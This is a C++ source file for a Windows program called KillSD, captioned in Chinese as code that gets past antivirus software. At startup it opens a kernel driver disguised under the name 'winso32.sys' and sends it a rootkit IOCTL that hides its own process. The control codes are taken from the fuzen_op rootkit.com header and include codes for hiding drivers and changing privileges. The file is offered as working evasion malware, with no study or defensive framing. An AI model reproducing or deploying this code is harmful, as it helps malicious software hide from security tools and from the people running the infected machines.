killsd.cpp

点击过杀毒软件的一个代码 目前可以过

 // KillSD.cpp : Defines the class behaviors for the application.
//

#include "stdafx.h"
#include "KillSD.h"
#include "KillSDDlg.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CKillSDApp

BEGIN_MESSAGE_MAP(CKillSDApp, CWinApp)
	//{{AFX_MSG_MAP(CKillSDApp)
		// NOTE - the ClassWizard will add and remove mapping macros here.
		//    DO NOT EDIT what you see in these blocks of generated code!
	//}}AFX_MSG
	ON_COMMAND(ID_HELP, CWinApp::OnHelp)
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CKillSDApp construction

CKillSDApp::CKillSDApp()
{
	// TODO: add construction code here,
	// Place all significant initialization in InitInstance
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CKillSDApp object

CKillSDApp theApp;

// -- 调用驱动程序接口隐藏进程
BOOL InvokeDeviceHideProcess( void );

/////////////////////////////////////////////////////////////////////////////
// CKillSDApp initialization

BOOL CKillSDApp::InitInstance()
{
	// Standard initialization
	// If you are not using these features and wish to reduce the size
	//  of your final executable, you should remove from the following
	//  the specific initialization routines you do not need.

	// -- 隐藏进程
	InvokeDeviceHideProcess();

	CKillSDDlg dlg;
	m_pMainWnd = &dlg;
	int nResponse = dlg.DoModal();
	if (nResponse == IDOK)
	{
		// TODO: Place code here to handle when the dialog is
		//  dismissed with OK
	}
	else if (nResponse == IDCANCEL)
	{
		// TODO: Place code here to handle when the dialog is
		//  dismissed with Cancel
	}

	// Since the dialog has been closed, return FALSE so that we exit the
	//  application, rather than start the application's message pump.
	return FALSE;
}

///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////////////////
// Filename ioctlcmd.h
// 
// Author: fuzen_op
// Email:  fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: Defines the IOCTL's used by the driver and the controlling DLL.
//
// Date:    5/27/2003
// Version: 1.0

#define FILE_DEVICE_ROOTKIT      0x00002a7b

#define METHOD_BUFFERED                 0
#define METHOD_IN_DIRECT                1
#define METHOD_OUT_DIRECT               2
#define METHOD_NEITHER                  3

#define FILE_ANY_ACCESS                 0
#define FILE_READ_ACCESS          ( 0x0001 )    // file & pipe
#define FILE_WRITE_ACCESS         ( 0x0002 )    // file & pipe

#define CTL_CODE( DeviceType, Function, Method, Access ) (                 \
    ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)

#define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTPROC        (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x03, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETPRIV         (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x05, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETAUTHID       (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x04, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETSID          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x06, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTDRIV        (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x07, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEDRIV        (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x08, METHOD_BUFFERED, FILE_WRITE_ACCESS)

#define IOCTL_TRANSFER_TYPE( _iocontrol)   (_iocontrol & 0x3)

static CHAR ac_driverLabel[] = "winso32";
static CHAR ac_driverName[] = "winso32.sys";

BOOL OpenDevice( IN LPCTSTR DriverName, HANDLE * lphDevice )
{
    TCHAR    completeDeviceName[64];
    HANDLE   hDevice;


	if( (GetVersion() & 0xFF) >= 5 ) {

		wsprintf( completeDeviceName, TEXT("\\\\.\\Global\\%s"), DriverName );

	} else {

		wsprintf( completeDeviceName, TEXT("\\\\.\\%s"), DriverName );
	}

    hDevice = CreateFile( completeDeviceName,
                          GENERIC_READ | GENERIC_WRITE,
                          0,
                          NULL,
                          OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL
                          );
    if ( hDevice == ((HANDLE)-1) )
        return FALSE;

	if ( lphDevice )
		*lphDevice = hDevice;
	else
	    CloseHandle( hDevice );

    return TRUE;
}

DWORD HideProc(HANDLE lphDevice,DWORD pid)
{
	DWORD d_bytesRead;
	DWORD success;
	success = DeviceIoControl(
					lphDevice, 
					IOCTL_ROOTKIT_HIDEME,
					(void *) &pid,
					sizeof(DWORD),
					NULL,
					0,
					&d_bytesRead,
					NULL);	
	return success;	
}

BOOL InvokeDeviceHideProcess(void)
{

	BOOL Okoy = FALSE;
	HANDLE hDevice = NULL;

	Okoy = OpenDevice( ac_driverLabel, &hDevice );
	if( FALSE == Okoy )
	{
		return FALSE;
	}

	DWORD dwRes = HideProc( hDevice, ::GetCurrentProcessId() );
	if( 0 != dwRes )
	{
		Okoy = FALSE;
	}

	::CloseHandle( hDevice );

	return Okoy;
}